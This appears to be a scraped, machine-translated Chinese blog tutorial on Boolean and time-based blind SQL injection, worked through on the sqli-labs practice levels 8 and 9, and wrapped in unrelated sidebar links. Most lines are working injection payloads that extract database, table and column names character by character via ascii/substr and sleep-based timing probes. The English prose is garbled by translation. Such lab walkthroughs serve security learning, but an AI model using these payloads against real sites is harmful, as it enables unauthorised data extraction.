当前位置:网站首页>SQL blind injection (WEB penetration)
SQL blind injection (WEB penetration)
2022-07-07 12:23:00 【hcjtn】
sql Blind note (web penetration )
- sql Blind note Mainly dealing with the page face wed Use when the error response is better ( namely , Error does not echo )
Bull's blind note
Use page return still No return We can judge the desired result by changing these two states ( Boolean for 0 or 1 Two cases )
The problem solving steps :( The following examples are all based on sql-lab less-8 For example )
Get the length of the database name : ?id=1’ and (length(database()))=8-- q( utilize > < or = To determine the length of its database )
Get the database name :
?id=1’ and ascii(substr(database(),1,1))=115 Indicates from the database 1 Start taking a length ( You will get a decimal number , utilize ASCII Table converts it into letters or symbols ) The first is s、
It can also be done through burp suite To do it
Get the number of tables : ?id=1’ and (select count(*) from information_schema.tables where table_schema=‘security’)>5(=4)-- q
Get the length of the name of the table : ?id=1’and (select length(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1)>5(=6)-- q Yes 6 Length
Get the name of the table : ?id=1’and (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q The first is e
Get field name :?id=1’and (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q The first is i
The function of Boolean blind note
- String concatenation function : Concat ,concat_ws, group_concat
- String truncation function :Substr, mid, left , right, locate
- Returns the specified ASCII Functions required by string :ascii,ord
- Returns the... Corresponding to the specified number ascii Code character :char
- String substitution :replace
- Calculate correlation : length( length ) count( Count )
Time blind note
- Time blind note :( With sql-lab less-9 For example ) The problem solving steps
The Ninth level is found according to the blind note just now, no matter what conditions are entered , The echo result is a , It is proved that the Boolean blind note just now cannot be used , Try to use time blind
Parsing library name length : ?id=1’ and if(length(database())=8,sleep(5),1)-- q( If set up , Just react in five seconds , notes : there 1 It doesn't mean anything )
Resolve database name :?id=1’ and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s
Resolve table name : ?id=1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :?id=1’ and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
The function of time blind :
- sleep() Hang the program for a while n by n second
- if(expr1,expr2,expr3) Judgment statement If the first statement is correct, execute the second statement If there is an error, execute the third statement .
边栏推荐
- 关于 Web Content-Security-Policy Directive 通过 meta 元素指定的一些测试用例
- C#中在路径前加@的作用
- 30. Few-shot Named Entity Recognition with Self-describing Networks 阅读笔记
- 108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]
- Up meta - Web3.0 world innovative meta universe financial agreement
- Superscalar processor design yaoyongbin Chapter 9 instruction execution excerpt
- Rationaldmis2022 advanced programming macro program
- Mastering the new functions of swiftui 4 weatherkit and swift charts
- <No. 9> 1805. Number of different integers in the string (simple)
- 《通信软件开发与应用》课程结业报告
猜你喜欢
![108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]](/img/c0/8a7b52c46eadd27cf4784ab2f32002.png)
108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]
![110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]](/img/62/1ec8885aaa2d4dca0e764b73a1e2df.png)
110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]

Several methods of checking JS to judge empty objects

wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6

<No. 8> 1816. Truncate sentences (simple)

千人规模互联网公司研发效能成功之路
![111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]](/img/2e/da45198bb6fb73749809ba0c4c1fc5.png)
111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]

Flet教程之 15 GridView 基础入门(教程含源码)

5V串口接3.3V单片机串口怎么搞?

powershell cs-UTF-16LE编码上线
随机推荐
The function of adding @ before the path in C #
(to be deleted later) yyds, paid academic resources, please keep a low profile!
【滤波跟踪】捷联惯导纯惯导解算matlab实现
Will the filing free server affect the ranking and weight of the website?
Common locking table processing methods in Oracle
[filter tracking] strapdown inertial navigation simulation based on MATLAB [including Matlab source code 1935]
[filter tracking] strapdown inertial navigation pure inertial navigation solution matlab implementation
Let digital manage inventory
Flet教程之 17 Card卡片组件 基础入门(教程含源码)
An error occurred when vscade tried to create a file in the target directory: access denied [resolved]
Improve application security through nonce field of play integrity API
Explore cloud database of cloud services together
When sink is consumed in mysql, the self incrementing primary key has been set in the database table. How to operate in Flink?
2022 年第八届“认证杯”中国高校风险管理与控制能力挑战赛
[shortest circuit] acwing1128 Messenger: Floyd shortest circuit
顶级域名有哪些?是如何分类的?
SwiftUI 4 新功能之掌握 WeatherKit 和 Swift Charts
The road to success in R & D efficiency of 1000 person Internet companies
Tutorial on principles and applications of database system (007) -- related concepts of database
110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]